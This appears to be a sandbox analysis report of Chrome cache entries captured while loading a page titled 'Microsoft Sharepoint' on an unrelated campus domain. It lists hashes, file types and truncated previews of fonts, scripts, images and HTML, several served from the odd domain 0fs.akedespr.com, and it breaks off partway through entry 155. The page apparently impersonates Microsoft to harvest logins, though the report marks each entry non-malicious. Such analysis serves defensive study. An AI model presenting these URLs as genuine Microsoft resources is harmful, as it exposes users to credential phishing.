Preview:	.PNG........IHDR...p..........{......sBIT....\|.d.....pHYs..;...;...3.+....tEXtSoftware.www.inkscape.org..<... .IDATx...w.]U....L.I(!.B..J..R....PD.z-.(...4Q..MQ. .(..EE.AP:.....HI.... ....ur3..r.Y.\|....z..3.2.g..{..Y.V..6.u...U...Q.Z.X......m..........^......O.^l......Y.)`\|...:......x.:."0r...H.W.....,.......j.....L%]s../4.>.<.........S.$I.$I.$I.T.....(`s`S`.`C`mR..J...6.x.x.x..z9.......g..j}R...h.1.t]=....n..#.f.I.$I.$I.$I%c.G.. 5il.l.lCj.(S.F;.....7...AZ.@B....%.E....C.be3..K....S."CI.$I.$I.$I...jV.v.v.v$5l..M.ysI......x{/i...Y...o..m.......v.6.>R..$I.$I.$I.......F.{..6v!...1{.Y..9ng...S..TF.I..;.o&5A.....&.w....$5J..M$I.$I.$I.$.........Q;..IQ...9n.nl.Z.e.......j.`hd..{..=p-p=n."I.$I.$I.$eg.G...........8...i......b. [.{.V.........V...96GI.$I.$I.$IY...c ..R...Q.q..,..........Gm........X=6NW......clp.I.$I.$I.$IZ..g...s...c...F.A.<z*.Q.a...+.?....8.Xn.GO.$I.$I.$I..,O.l....@.....z.....R..a$.:...I.yb-....l....$I.$I.$I.$.....$.'S..j.p..3NBGX..M.3.?.......p$I.$

Chrome Cache Entry: 133

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (15443), with CRLF line terminators
Category:	downloaded
Size (bytes):	57279
Entropy (8bit):	5.458719209688348
Encrypted:	false
SSDEEP:
MD5:	F863BAACDCE0BA6255323470AE75D5C9
SHA1:	FE0A637BD9213E6D55E6656BF8904DD6F70A9996
SHA-256:	D1E64695A525A9405F18CB5CAD0AE0EA68DDDD848C84E3AFAF2E783C4CC138FF
SHA-512:	2D78D1FF5CBF52C6BDF46D2B8EF0850529C5DB57EDB7EB798A572BE40D4698F411B38225CBB0C6CD2CED3AC37A3364A2BEC28F3413FCE96B2577903D61E38509
Malicious:	false
Reputation:	unknown
URL:	https://campus.espaciocicfa.com/Sharepointproposal/
Preview:	<html xmlns="http://www.w3.org/1999/xhtml" lang="en-us">..<head>.. <meta charset="utf-8">.. <meta http-equiv="x-ua-compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1">.. <title>Microsoft Sharepoint</title>.. <link rel="icon" href="https://cdn.forms.office.net/forms/images/customervoice/customervoice.ico">.. .. <script type="text/javascript" nonce="">.. window.OfficeFormServerInfo = {.. addPrefixForProWhenNoCdn: true,.. antiForgeryToken: "GhcmcEKMpQoLmcyVblnNoX4TjnVPfZ2ZULLXLp8Fo1G9LTnqDkYkPWBrRa0SZaXRGg64kCe20peZ-1mLyZsNOiboSIhOZPc2iZ0toUGJOhI1",.. cultureInfo: {"Calendar":{"TwoDigitYearMax":2029},"DateTimeFormat":{"AbbreviatedDayNames":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"AbbreviatedMonthNames":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec"],"AMDesignator":"AM","DayNames":["Sunday","Monday","Tuesday"

Chrome Cache Entry: 137

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 93276, version 1.0
Category:	downloaded
Size (bytes):	93276
Entropy (8bit):	7.997636438159837
Encrypted:	true
SSDEEP:
MD5:	BCD7983EA5AA57C55F6758B4977983CB
SHA1:	EF3A009E205229E07FB0EC8569E669B11C378EF1
SHA-256:	6528A0BF9A836A53DFD8536E1786BA6831C9D1FAA74967126FDDF5B2081B858C
SHA-512:	E868A2702CA3B99E1ABBCBD40B1C90B42A9D26086A434F1CBAE79DFC072216F2F990FEC6265A801BC4F96DB0431E8F0B99EB0129B2EE7505B3FDFD9BB9BAFE90
Malicious:	false
Reputation:	unknown
URL:	https://0fs.akedespr.com/efhmLtoaKGMi81xl8TzK3349XVgOdtJgIR4kl97
Preview:	wOF2......l\....... ..k...........................v...&..$?HVAR.j?MVAR.F.`?STAT.6'8.../.H........x....0..:.6.$..0. ..z...[....%"...........!.I.T....w.!c.H...t.]k......6..Cy..Ul.re........I..%.%....DE....v.i.QF8....iH.!r......P4Z[....Zs....o..r..8b.O....n...!......R}GL..5n!....^..I...A.....U...,&..uz....E.R.K/GL...#..U..A8%.rd..E,}...'e...u..3.dD....}..:..0.a..#O8.\|.7..{.}.o......(.D..HX...w.;F...g.+....g.x..,.@~<.K......ZJw......^.!..{:..<..`N..h..0.t..NA..,...]........On./..X\|_=...e,.tS..3Z..q_....'F[..jR.?U..k.:+;..Z.co5..l..yV.Md..4.6............L8q..._...AX.y.Cc...Agb..a.K...N....`-..N.b.u...q..i.S...p..j*...fA.......?.Z.Ee.~\|.\..TZ._...?./a.64..+.]..(gq..d..\K...S..z.i.l[.........1=....I.....4g.?.G.3.&.0L&.$.@R6...U..o..:.S.=.....bU..u.]z.W8[U.\|7.'.%..u...11..g<.^...J..PB.JHB...k........].($..D...S"u...7...9.8.....U..7...R$..x...g.X.zV.,.$....y.:.....Q$OM....q.. ...(.O....".d<.l..9..\|^B.r.5......yi.D..._...<P..o....(Re.I...@E.~..T.

Chrome Cache Entry: 138

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1437), with CRLF line terminators
Category:	downloaded
Size (bytes):	38221
Entropy (8bit):	5.115226983536052
Encrypted:	false
SSDEEP:
MD5:	FBE2FCF4596B299453C91B7231BA7427
SHA1:	743291EE60A551E043529AFDC9E3FBE72D70E776
SHA-256:	2DE22B4CDEDCBEB9CD5F63EA7A0DF8F77D0EF9086D200B052BFA9EE949DEED40
SHA-512:	15CA09CD5754927D77B2CC9B74356585C5A1DD934ECF25B613F47964236A739DA8BE389999DE1AEEE7BDF8FA12FCBB07EEFF49E0EA80BA87AC786606DE74774F
Malicious:	false
Reputation:	unknown
URL:	https://0fs.akedespr.com/xyq2xQUXDsHpqGptef30
Preview:	@font-face{font-family: 'gdsherpa';font-weight: 700;src: url('/web8/assets/fonts/GDSherpa-bold.woff2') format('woff2'),url('/web8/assets/fonts/GDSherpa-bold.woff') format('woff');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gdsherpa';font-weight: 400;src: url('/web8/assets/fonts/GDSherpa-regular.woff2') format('woff2'),url('/web8/assets/fonts/GDSherpa-regular.woff') format('woff');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gdsherpa';font-weight: 1 999;src: url('/web8/assets/fonts/GDSherpa-vf.woff2') format('woff2'),url('/web8/assets/fonts/GDSherpa-vf.woff2') format('woff2-variations');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gdsherpa';font-weight: 1 900;src: url('/web8/assets/fonts/GDSherpa-vf2.woff2') format('woff2'),url('/web8/assets/fonts/GDSherpa-vf2.woff2') format('woff2-variations');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gd-sage';font-weight: 700;src: url('/web8/ass

Chrome Cache Entry: 140

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	268
Entropy (8bit):	5.111190711619041
Encrypted:	false
SSDEEP:
MD5:	59759B80E24A89C8CD029B14700E646D
SHA1:	651B1921C99E143D3C242DE3FAACFB9AD51DBB53
SHA-256:	B02B5DF3ECD59D6CD90C60878683477532CBFC24660028657F290BDC7BC774B5
SHA-512:	0812DA742877DD00A2466911A64458B15B4910B648A5E98A4ACF1D99E1220E1F821AAF18BDE145DF185D5F72F5A4B2114EA264F906135F3D353440F343D52D2E
Malicious:	false
Reputation:	unknown
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill="#404040"/></svg>

Chrome Cache Entry: 141

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format, TrueType, length 35970, version 1.0
Category:	downloaded
Size (bytes):	35970
Entropy (8bit):	7.989503040923577
Encrypted:	false
SSDEEP:
MD5:	496B7BBDE91C7DC7CF9BBABBB3921DA8
SHA1:	2BD3C406A715AB52DAD84C803C55BF4A6E66A924
SHA-256:	AE40A04F95DF12B0C364F26AB691DC0C391D394A28BCDB4AEACFACA325D0A798
SHA-512:	E02B40FEA8F77292B379D7D792D9142B32DFCB887655A2D1781441227DD968589BFC5C00691B92E824F7EDB47D11EBA325ADE67AD08A4AF31A3B0DDF4BB8B967
Malicious:	false
Reputation:	unknown
URL:	https://0fs.akedespr.com/12YOIGH4BKN8SNO789PlWipqr50
Preview:	wOFF..............$ .......\...&............DSIG...T............GPOS..........N..B..GSUB...`.........3y.OS/2.......F...`i.{[cmap...X.......<.?+.cvt ......./...<)...fpgm............?...gasp................glyf..!t..Ra....$.ihead..s....3...6..}.hhea..t....!...$....hmtx..t0.......x?s.#loca..w.........LC%.maxp..{X... ... .5..name..{x..........post..~@........1+.,prep.............P..x..\.tU..;y...!..!..R.4."(."".U..V.]3...r..5c...j....._.7U...H..1MSE...0b..b&.......%..w...}.{.......u...s..g..soBLD~.C.)n..1.Q...z.q. ..R..)n.QY.v..{.(...o...O.......G...{to.~.....,..#<.w...W...?6..3....2.)O........].`_a..F'.6..."}&..$'.K...a..NK$..01ar......-.Do_. .H.].x'{....n....{.\|.L.p..u...-.w}.}...~.....(.zP:..^t.=D?..i9.....m.......AE.......J.....j......q&_...`....P....M<.o.[.V....H..Sx:...<.g.....x>/.......^..x9.....Ws...&.....x....jUJ...B.S...2(_...U...Q...<..y.j.y...P.x.:....m+..V.....5h[.~E.WL..rp....0..Pu..$OA....LJ.Y.....9.e...L..... /"?.m.......+..J.........

Chrome Cache Entry: 142

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (39928)
Category:	downloaded
Size (bytes):	39929
Entropy (8bit):	5.378411954063623
Encrypted:	false
SSDEEP:
MD5:	7F3FE50B0F2AD92528FF217C1B608B27
SHA1:	54FC4814C739C7142EF4A5B562140EE764BCBDFC
SHA-256:	D2E584D67A5B1A868363ED5E83A72EA6BC2CAD8A052F64583D0FE95E7FA36E97
SHA-512:	3B4F838B651CC39D8CA8B5C815CCE04B0062A26F8C398CD5D1943995C2C47049D2546407FBE619219EACF417D1D66FEB0AA77512BF52848CF961BB0D3F7A98EE
Malicious:	false
Reputation:	unknown
URL:	https://challenges.cloudflare.com/turnstile/v0/g/dc6b543c1346/api.js?render=explicit
Preview:	"use strict";(function(){function gt(e,r,t,i,u,s,g){try{var y=e[s](g),m=y.value}catch(f){t(f);return}y.done?r(m):Promise.resolve(m).then(i,u)}function yt(e){return function(){var r=this,t=arguments;return new Promise(function(i,u){var s=e.apply(r,t);function g(m){gt(s,i,u,g,y,"next",m)}function y(m){gt(s,i,u,g,y,"throw",m)}g(void 0)})}}function k(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):k(e,r)}function Ee(e,r,t){return r in e?Object.defineProperty(e,r,{value:t,enumerable:!0,configurable:!0,writable:!0}):e[r]=t,e}function ze(e){for(var r=1;r<arguments.length;r++){var t=arguments[r]!=null?arguments[r]:{},i=Object.keys(t);typeof Object.getOwnPropertySymbols=="function"&&(i=i.concat(Object.getOwnPropertySymbols(t).filter(function(u){return Object.getOwnPropertyDescriptor(t,u).enumerable}))),i.forEach(function(u){Ee(e,u,t[u])})}return e}function ir(e,r){var t=Object.keys(e);if(Object.getOwnPropertySymbols){var i=Object.getOwnPropertyS

Chrome Cache Entry: 143

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.241202481433726
Encrypted:	false
SSDEEP:
MD5:	9E576E34B18E986347909C29AE6A82C6
SHA1:	532C767978DC2B55854B3CA2D2DF5B4DB221C934
SHA-256:	88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
SHA-512:	5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
Malicious:	false
Reputation:	unknown
Preview:	{"Message":"The requested resource does not support http method 'GET'."}

Chrome Cache Entry: 144

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text
Category:	downloaded
Size (bytes):	315
Entropy (8bit):	5.0572271090563765
Encrypted:	false
SSDEEP:
MD5:	A34AC19F4AFAE63ADC5D2F7BC970C07F
SHA1:	A82190FC530C265AA40A045C21770D967F4767B8
SHA-256:	D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
SHA-512:	42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
Malicious:	false
Reputation:	unknown
URL:	https://campus.espaciocicfa.com/favicon.ico
Preview:	<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.

Chrome Cache Entry: 145

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 text, with very long lines (31529), with no line terminators
Category:	downloaded
Size (bytes):	31553
Entropy (8bit):	4.80002419874022
Encrypted:	false
SSDEEP:
MD5:	32B88A39A3B2DBC352940025A382B8CC
SHA1:	E1617F664FB1E18CB217836D4564F3C4333F3DF9
SHA-256:	FD71FA3B5191EEE12E167BF4FE9FC135D36C15D203EBB4CE37FA1B0B79F13320
SHA-512:	A7890B500BB982ED888E04CA56DA6E1BED7A75676666DB416BCEFABF4F77BCB80B3BC194A1273D364D7FF88A613376AE8706EBA2E0C9C8AA38F29885D0E77644
Malicious:	false
Reputation:	unknown
URL:	https://cdn.forms.office.net/forms/scripts/dists/ls-response.en-us.da3f9f60d.js
Preview:	window.FormsLsMap = (window.FormsLsMap \|\| {});window.FormsLsMap["en-us"]={"mdbicgo":"Required to answer","lbnbnjb":"Please share your comments here","jchpiio":"Help improve phishing detection","hkplpef":"It's not collecting sensitive info","lifjakb":"It needs to collect sensitive info","eackega":"Other","mnpehin":"Did this form trigger a false positive? Click to provide details.","amlalmd":"Why did you unblock this form?","acmngdo":"This user is not currently restricted from using Microsoft Forms. No further action is needed..","pdnfcop":"Correct","gplbmcp":"Print response","pfjnaob":"Required","efmefee":"To access the full range of AI capabilities, please click \"Allow\" and allow access in the popup window.","jcamdkj":"Allow access to continue","dlogacb":"Pause background music","oancfdj":"Play background music","pjgjcee":"Pause live background","dplcjia":"Play live background","giamlmc":"Please select at least {0} options.","ggbmbok":"Please select at most {0} options.","mbpambh":

Chrome Cache Entry: 146

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (63096)
Category:	downloaded
Size (bytes):	63350
Entropy (8bit):	5.119568293747089
Encrypted:	false
SSDEEP:
MD5:	9D2DD1DCF2590DE6A481BE4226B489B3
SHA1:	14DECCA6CC19A8E7F1FEA02BF53FB30166531414
SHA-256:	8436F0E7540FC0A0D15D2470979A7E624B2505B32BC93AF741BA7380D2DCFB2B
SHA-512:	C184BE78C958B762EF49C464319AACD935D0C3E0A764F56319271E2F82343B1F904EC013F56AACE1848F1B19FDE70769123FD24CC9A87DC6BAF95210115C301D
Malicious:	false
Reputation:	unknown
URL:	https://cdn.forms.office.net/forms/scripts/dists/response-page-pro.cachegroup-nerve.min.52db3c7.js
Preview:	"use strict";(self.webpackChunk=self.webpackChunk\|\|[]).push([[527],{41293:function(n,t,r){function i(n,t){n\|\|(console.assert(n,"Nerve - "+t),s("assert failed: ".concat(t)))}function e(n){return s("TODO: ".concat(n))}function u(){return s("to be overridden.")}function o(n){if(n="Nerve - warning: ".concat(n),console.warn(n),c){var t=new Error(n).stack;c(t)}}r.d(t,{ZK:function(){return o},_y:function(){return s},ct:function(){return u},hu:function(){return i},ys:function(){return e}});var c=null;function s(n){throw Error("Nerve - "+n)}},42874:function(n,t,r){r.d(t,{k:function(){return e},s:function(){return u}});var i=r(36630),e=function(){return function(n){void 0===n&&(n={}),u(this,n)}}();function u(n,t,r){void 0===r&&(r=!1),(0,i.zO)(n,"__nerve__",t,r)}},39923:function(n,t,r){r.d(t,{J4:function(){return w},bn:function(){return a},f4:function(){return h},u9:function(){return l}});var i=r(26203),e=r(41293),u=r(42874),o=r(36630),c="Spec",s=Object.freeze({IsKeyField:!1,IsLocalField:!1,IsNum

Chrome Cache Entry: 147

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (45667)
Category:	downloaded
Size (bytes):	45806
Entropy (8bit):	5.207605835316031
Encrypted:	false
SSDEEP:
MD5:	80F5B8C6A9EEAC15DE93E5A112036A06
SHA1:	F7174635137D37581B11937FC90E9CB325077BCE
SHA-256:	0401DE33701F1CAD16ECF952899D23990B6437D0A5B7335524EDF6BDFB932542
SHA-512:	B976A5F02202439D94C6817D037C813FA1945C6BB93762284D97FF61718C5B833402F372562034663A467FDBAA46990DE24CB1E356392340E64D034E4BA1B4E4
Malicious:	false
Reputation:	unknown
URL:	https://cdn.socket.io/4.6.0/socket.io.min.js
Preview:	/!. Socket.IO v4.6.0. * (c) 2014-2023 Guillermo Rauch. * Released under the MIT License.. */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof globalThis?globalThis:t\|\|self).io=e()}(this,(function(){"use strict";function t(e){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},t(e)}function e(t,e){if(!(t instanceof e))throw new TypeError("Cannot call a class as a function")}function n(t,e){for(var n=0;n<e.length;n++){var r=e[n];r.enumerable=r.enumerable\|\|!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(t,r.key,r)}}function r(t,e,r){return e&&n(t.prototype,e),r&&n(t,r),Object.defineProperty(t,"prototype",{writable:!1}),t}function i(){return i=Object.assign?Object.assign.bind():function(t){for(var e=

Chrome Cache Entry: 148

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	270
Entropy (8bit):	4.840496990713235
Encrypted:	false
SSDEEP:
MD5:	40EB39126300B56BF66C20EE75B54093
SHA1:	83678D94097257EB474713DEC49E8094F49D2E2A
SHA-256:	765709425A5B9209E875DCCF2217D3161429D2D48159FC1DF7B253B77C1574F4
SHA-512:	9C9CD1752A404E71772003469550D3B4EFF8346A4E47BE131BB2B9CB8DD46DBEF4863C52A63A9C63989F9ABEE775CB63C111ADD7AFA9D4DFC7A4D95AE30F9C6E
Malicious:	false
Reputation:	unknown
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fill="#262626"/></svg>

Chrome Cache Entry: 149

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1222), with no line terminators
Category:	downloaded
Size (bytes):	1222
Entropy (8bit):	5.812687833352702
Encrypted:	false
SSDEEP:
MD5:	3F1B1790C083261F6FD3CF02FB56F2F8
SHA1:	BF1B289456E260CF5C5F0AF7C1B0F4E9BA7EB97B
SHA-256:	A58FF2DE4D6A14E055A553E83A4E67AEA6AAF589A57364305EEC36105CCE9EF3
SHA-512:	99D52B4D79A3B36CDAF0640C37FA504518DAF3C23A2FEAAE6A4966633D5407F1941F726741BE59E25A6726698614D202033BC6BD3D34DD2A352789088C54F0DE
Malicious:	false
Reputation:	unknown
URL:	https://www.google.com/recaptcha/api.js
Preview:	/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]\|\|{},N='grecaptcha';var gr=w[N]=w[N]\|\|{};gr.ready=gr.ready\|\|function(f){(cfg['fns']=cfg['fns']\|\|[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']\|\|[]).push('onload');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true;var m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='Az520Inasey3TAyqLyojQa8MnmCALSEU29yQFW8dePZ7xQTvSt73pHazLFTK5f7SyLUJSo2uKLesEtEa9aUYcgMAAACPeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZyIsImV4cGlyeSI6MTcyNTQwNzk5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=';d.head.prepend(m);po.src='https://www.gstatic.com/recaptcha/releases/rz4DvU-cY2JYCwHSTck0_qm-/recaptcha__en.js';po.crossOrigin='anonymous';po.integrity='sha384-eZG8e4nRp0gEpRB75JBNzhS0vVseDRBVprGQYHJN

Chrome Cache Entry: 151

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	727
Entropy (8bit):	7.573165690842521
Encrypted:	false
SSDEEP:
MD5:	839CB0F55C3D2D5C2F740BDA95CB2878
SHA1:	93F6FA3A2DA8B7184D4B5C5F2065872793370C2E
SHA-256:	40ECB8832F6A9A8AAA0CC6E1287E867A4FCA38433D091D86C6CAB1F28FBAB652
SHA-512:	ECBCA8AB21BF3302C88F933CFD248CFF5553AFE152A170F554C27FD67BDC3E7D8CE79E202561FD0658E41820681EB90F74E38FD09390C517AFB34D2C1B65A096
Malicious:	false
Reputation:	unknown
URL:	https://0fs.akedespr.com/qrBwLzMpuCNIPcXvBxo7mGwmnU4OcDpv0gsFGP67140
Preview:	.PNG........IHDR...0...0.....W.......IDAThC.Q.1.E.......`... .............T...:....7r....sw;Y.h..dK__.........M.v.....@a....j..P.;..K....^%..m...Nn.......y..l.]@..z.T..X..e...DZ.$Y......o`.L@`..r.0...s8Bd...1..M.=.A...a.'./...O....@4.mk..2.\..H.ER...e....s...`._.;..5n...X\|o..K....w...8........i8L..6P\|r9.=!...j..........~X{.Y.5X....4...v.Z.&.... ..)..ZXJ.8..... ..-p.9t.N...r.[..t....=\ >pLg%m..@........8o.).%..S...d.E\|%.......5.p..QK0Z<...0...:Q...<.m^<.y....7..#r..Qm...DZ..}.5.c.&.....0..Wr.....w.f-.n... .-..,l..0..3...E..4k.~..Y.B:t.*}.L..z..U.b......s............w.(......jt.Z5.7..8........0...?..1.w."&......8j.5vO.<..OgSM.j%..u..E=:..XJ==.....(...30.(....O)41P.....pkQ@f.S.....IEND.B`.

Chrome Cache Entry: 152

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (34261)
Category:	downloaded
Size (bytes):	106265
Entropy (8bit):	5.423004269302938
Encrypted:	false
SSDEEP:
MD5:	B62AA33925A38C9FB6DCFA225EF292DE
SHA1:	288600CF2CF9588C4DD57A315F46317F9BED1F56
SHA-256:	942AD7BD59D31053D8883DE9C9B9274CB02F3BD42301DC5A1D90DBEB41D50019
SHA-512:	8AC7ABB1FC06AE0386083BE58F76AECFBAB3318C314775BF781F383DE44C9459EB1CB183CCBFDA4C04375538522D47A75B0ADD97A5EB6C57137D2C3C7AEB8CC9
Malicious:	false
Reputation:	unknown
URL:	https://cdn.forms.office.net/forms/scripts/dists/response-page-pro.chunk.1ds.180fa1b.js
Preview:	"use strict";(self.webpackChunk=self.webpackChunk\|\|[]).push([[641],{79966:function(n,e,t){t.d(e,{Z:function(){return D}});var r=t(49577),i=t(71106),o=t(40154),u=t(80403),a=t(39523),c=t(61746),s=t(72480),f=t(52863),l=t(86969),d=t(90962),v=t(58398),p=500;function h(n,e,t){e&&(0,a.kJ)(e)&&e[s.R5]>0&&(e=e.sort((function(n,e){return n[l.yi]-e[l.yi]})),(0,a.tO)(e,(function(n){n[l.yi]<p&&(0,a._y)("Channel has invalid priority - "+n[s.pZ])})),n[s.MW]({queue:(0,a.FL)(e),chain:(0,d.jV)(e,t[s.TC],t)}))}var g=t(28165),m=t(45480),y=t(66450),C=function(n){function e(){var t,r,u=n.call(this)\|\|this;function f(){t=0,r=[]}return u.identifier="TelemetryInitializerPlugin",u.priority=199,f(),(0,i.Z)(e,u,(function(n,e){n.addTelemetryInitializer=function(n){var e={id:t++,fn:n};return r[s.MW](e),{remove:function(){(0,a.tO)(r,(function(n,t){if(n.id===e.id)return r[s.cb](t,1),-1}))}}},n[l.hL]=function(e,t){for(var i=!1,u=r[s.R5],f=0;f<u;++f){var l=r[f];if(l)try{if(!1===l.fn[s.ZV](null,[e])){i=!0;break}}catch(n)

Chrome Cache Entry: 153

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	1864
Entropy (8bit):	5.222032823730197
Encrypted:	false
SSDEEP:
MD5:	BC3D32A696895F78C19DF6C717586A5D
SHA1:	9191CB156A30A3ED79C44C0A16C95159E8FF689D
SHA-256:	0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
SHA-512:	8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
Malicious:	false
Reputation:	unknown
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r

Chrome Cache Entry: 154

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 28584, version 1.66
Category:	downloaded
Size (bytes):	28584
Entropy (8bit):	7.992563951996154
Encrypted:	true
SSDEEP:
MD5:	17081510F3A6F2F619EC8C6F244523C7
SHA1:	87F34B2A1532C50F2A424C345D03FE028DB35635
SHA-256:	2C7292014E2EF00374AEB63691D9F23159A010455784EE0B274BA7DB2BCCA956
SHA-512:	E27976F77797AD93160AF35714D733FD9E729A9981D8A6F555807981D08D8175E02692AA5EA6E59CEBD33895F5F6A3575692565FDD75667630DAB158627A1005
Malicious:	false
Reputation:	unknown
URL:	https://0fs.akedespr.com/90ED4txGgd245qzEXOst57
Preview:	wOF2......o.......6x..oG...B.......................>....`..<.<..b.....h..B.6.$..x..>.. ..'..{...[x"q..].....hJ....'.......6.2.[....q....z..mCww....eU..S.........0..S.s..,....\.e..F.&....oUR.}Q.C..2.TD....5..#..h.H.2.\|<.1.z..].xZ...z..z..W.........p%..F.e.r"yG.......f.M3.].U.p...E..<..:..j..E......t....!....~a...J.m....f.d.eE..>.:.9.....,6K{.q..6e..4:z......{.{....$.. ...B....9:0.G..6.9R....m..jCW.m.]:{.p..?P.O.B..E....u.J.._..........dd=. l..SJ..fjm....\....)...6......mV.`.J.R.A..R.....J...T.y.........m...k-....{'.Ud"...C.$d.N 9}.N]..2p.q.T..6.-A.U...."..o.\......uh...$..4j..v...9....anl/NT....K....k..A...........U5S.=.t[.)/s.R.......F..)6H A..'?!....7S.....w:.%.H.@...l?...lm..lUd D...-.... .......5).`..w&..Q....-.. ...9.Xt./SQ?.s+u.9..\.h.l.G.#...#@.F..f.1.f..=`....p.....=c..f=..p 4By.u.z'...$;.s.....z.....X..n6y-...........<.......X......~+j.z.j.......7.PD..O..w..9..8].!~C&.......LCE..Nf~.N.eJ.iXnXC.&....t.U..Nr.@..lZ.... .X..

Chrome Cache Entry: 155

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (47421), with CRLF line terminators
Category:	downloaded
Size (bytes):	369103
Entropy (8bit):	5.381338995618774
Encrypted:	false
SSDEEP:
MD5:	6E9386843C22345A256F324692D627F2
SHA1:	FEF7FADB3A27032695AAB726682A340D583BFC51
